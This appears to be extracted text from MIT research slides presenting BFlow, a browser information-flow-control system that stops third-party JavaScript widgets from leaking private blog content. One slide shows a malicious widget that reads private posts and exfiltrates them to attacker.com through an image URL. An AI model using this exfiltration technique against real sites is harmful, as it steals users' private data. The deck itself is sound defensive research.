PrivacyPreserving BrowserSide Scripting With BFlow

1
Privacy-Preserving Browser-Side Scripting With
BFlow

• Alexander Yip, Neha Narula,
• Maxwell Krohn, Robert Morris
• Massachusetts Institute of Technology

2
Web Sites Support 3rd Party JavaScript Extensions

• Blogger.com supports widgets
• read and modify blog posts

3
Confidential Blogs Are Vulnerable to 3rd Party
JavaScript
v
4
A 3rd Party JavaScript Leak Attack
Widget has access to private blog content
Widgets JavaScript source code
Widget leaks private blog content to attacker.com
private_data document.getElementById(posts) w
idget.innerHTML private_data
widget.innerHTML ltIMG SRChttp//attacker.c
om/ private_data .gifgt
Shows private blog content in widgets box

• Blogger.com wants to provide data to widgets
• Browser security policy permits JS to send data
  freely
• Wrote a malicious blogger.com widget in one hour

5
Problem Extensibility vs. Privacy
(Choose one)

• Either choose cool extensibility features
• e.g. Blogger.com widgets
• Or choose privacy and no 3rd party code
• e.g. Gmail

Dans Spell Checker
Joes Encryption Widget
Check Spelling!
Encrypt Mail
Decrypt Mail
6
Solution BFlow

• Eliminate the choice between features privacy
• Add information flow control (IFC)
• To JavaScript in the browser
• Track private data inside the browser and server
• Prohibit communication that leaks private data

7
Challenges

• Fit JavaScript environment into an IFC model
• Preserve JavaScript communication channels

• Fit JavaScript environment into an IFC model
• Preserve JavaScript communication channels
• Mashups with private data

• Fit JavaScript environment into an IFC model
• Preserve JavaScript communication channels
• Mashups with private data

Send to top-level frame
Send to sub-frame

• Easy to adopt
• Minimize changes to JS that uses existing
  communication channels
• Minimize changes required on the server
• Easy for end-users to start using

Private address
Google Maps Server
8
Contributions

• An IFC model for the JS runtime environment
• Easy to deploy and adopt implementation
• Installs in browser with 2 clicks
• Requires no changes to JavaScript interpreter
• Only small changes to JavaScript communication
  API
• A platform that supports real blogger.com widgets

9
BFlow Overview
Trusted Protection Zone
Untrusted Protection Zones
Blog Server Supplies Some HTML/JS
Blog Web Server
Blog Server labels private data with a tag
Reference Monitor knows when a zone reads private
data
attacker.com Server
Label Saw Alices private data
Label Saw Alices private data
3rd Party Supplies Widget HTML/JS
Browser Reference Monitor
10
BFlow Overview
Declassification Fetch Map Image from Google
Maps, OK!
Have not seen private data Can send requests to
any server
Blog Web Server
Have seen private data Can only send requests to
the datas server
attacker.com Server
Google Maps Server
BFlow prevents the malicious widget from leaking
private data
Browser Reference Monitor
11
Design Outline

• Tags and Labels
• Protection Zones
• Reference Monitor
• Server

12
Tags And Labels

• A label is a set of tags
• Describes what private data an object contains
• Each zone, HTTP request, and response has a label

• A label is a set of tags
• Describes what private data an object contains
• Each zone, HTTP request, and response has a label

• Each tag identifies a kind of private data
• Alices tag blogger.comalice
• Bobs tag blogger.combob
• e.g. Alices blog has label Lblogger.comalice

13
Data Flow Rule

• Data may flow only if Ldata ? Lreceiver

Receiver JavaScript
Data
?
14
Protection Zones

• A zone is a group of browser HTML ltframesgt
• Regular JavaScript runs inside a frame inside a
  zone
• All frames in a zone share the same label
• Trusted zone
• Top-level frame is in the sites trusted zone
• Contains JavaScript written only by the sites
  developers
• Need not abide by information flow restrictions
• Untrusted zones
• Contain 3rd party JavaScript
• Must abide by information flow restrictions

15
Example Zones Labels
Trusted Zone (No Label)
Zone A L
Zone C L
Zone D Lblogger.comalice
Zone B Lblogger.comalice
16
How Do Untrusted Zones Get Labels?
Trusted zone sets untrusted zones label
L
Lblogger.comalice
augment_label (blogger.comalice)
Blog Web Server
Browser Reference Monitor
17
Works With Existing JS Channels

• Channel 1 A frame can always send to its child
  frame
• Lparent ? Lchild

• Channel 1 A frame can always send to its child
  frame
• Lparent ? Lchild

• Channel 2 A frame can always send to the
  top-level frame
• To avoid leaking data, untrusted zones may
  contain only tags from the web site in the
  top-level frame

Web Page Showing Inherent JavaScript Channels
Top-level Frame from X.com
Frame 1 may not add X.comC to its label
Frame 1 LX.comA
No sub-frame from X.com may add a tag from Y.com
Frame 2 LX.comA,X.comB
18
Why Zones Instead Of Frames?

• Some JavaScript consists of multiple frames
• Group JavaScript into modules by label
• All frames in the same zone can always
  communicate
• Trusted JavaScript sets the label of a
  multi-frame widget only once
• Existing multi-frame widgets need not coordinate
  label changes

e.g. Cbox chat widget
Bottom frame writes messages to top frame
19
BFlows JavaScript Model

• All JavaScript will work if the IFC rules allow
• AJAX, eval()
• The IFC rule (Ldata ? Lreceiver) affects
• access to DOM variables cookies
• postMessage(), fragment-ID messages
• HTTP requests and responses

20
HTTP Request Rules

• Trusted zone T
• can send to any server (always)
• can receive a response from any server (always)
• Untrusted zone Z
• can send to the server where secret data came
  from (always)
• can receive the response (when Lresponse ? LZ)
• can send to 3rd party server E (when LZ )
• or web site has a declassification exception for
  (server E, URL)
• can receive the response (always)

21
The BFlow Server API

• Propagate label from HTTP requests to responses
• Read label contained in each request
• Attach the label to any response that uses
  labeled data

HTTP Request POST save_post?contentsell_petfood_
online Label L blogger.comalice
Zone A Lblogger.comalice
Blog Web Server
Lblogger.comalice
Lblogger.comalice
Zone B Lblogger.comalice
HTTP Response Contents sell_petfood_online Label
L blogger.comalice
22
BFlow Implementation
No changes to JavaScript interpreter
JavaScript communication API changed slightly
Firefox Extension 1100 Lines of code Users can
install with 2 clicks
Browser Reference Monitor
23
Zone Isolation

• Repurpose browsers same-origin policy (SOP)
• Zones communicate via reference monitor

• Repurpose browsers same-origin policy (SOP)
• Zones communicate via reference monitor
• SOP is conservative no DOM read/write across
  zones even if labels would allow

Domain name Zone1.blogger
No direct communication
Domain name Zone2.blogger
24
Applications

• BF-Socialnet
• Social network that supports 3rd party JS
  extensions
• Protects private user data (see paper)
• BFlogger
• Blog mockup that supports blogger.com widgets
• Ported 12 existing widgets to BFlogger

25
BFlow Preserves Privacy

• Wrote a malicious Blogger.com widget
• Successfully leaks data from confidential blogs
• Ported widget to BFlogger
• BFlow prevents malicious widget from leaking data

attacker.com Server
No requests to attacker.com after reading private
data
26
BFlow Runs Existing JavaScript

• Better privacy with little or no changes

High because we made Chat store data on the BFlow
server to protect chat data
27
Existing Research

• Cant grant read access without also leaking
  MashupOS
• Requires rewriting JavaScript manual jail
  config Caja
• Dont support untrusted JavaScript Swift, SIF
• User must make disclosure decisions NoMoXSS
• Certificates Java

28
Conclusion

• 3rd party JavaScript can leak confidential user
  data
• BFlow provides a new web security model
• Tracks information flow between client server
• 3rd party JavaScript can safely compute and
  display
• Enables new features in web sites
• e.g. 3rd party Gmail extensions

Questions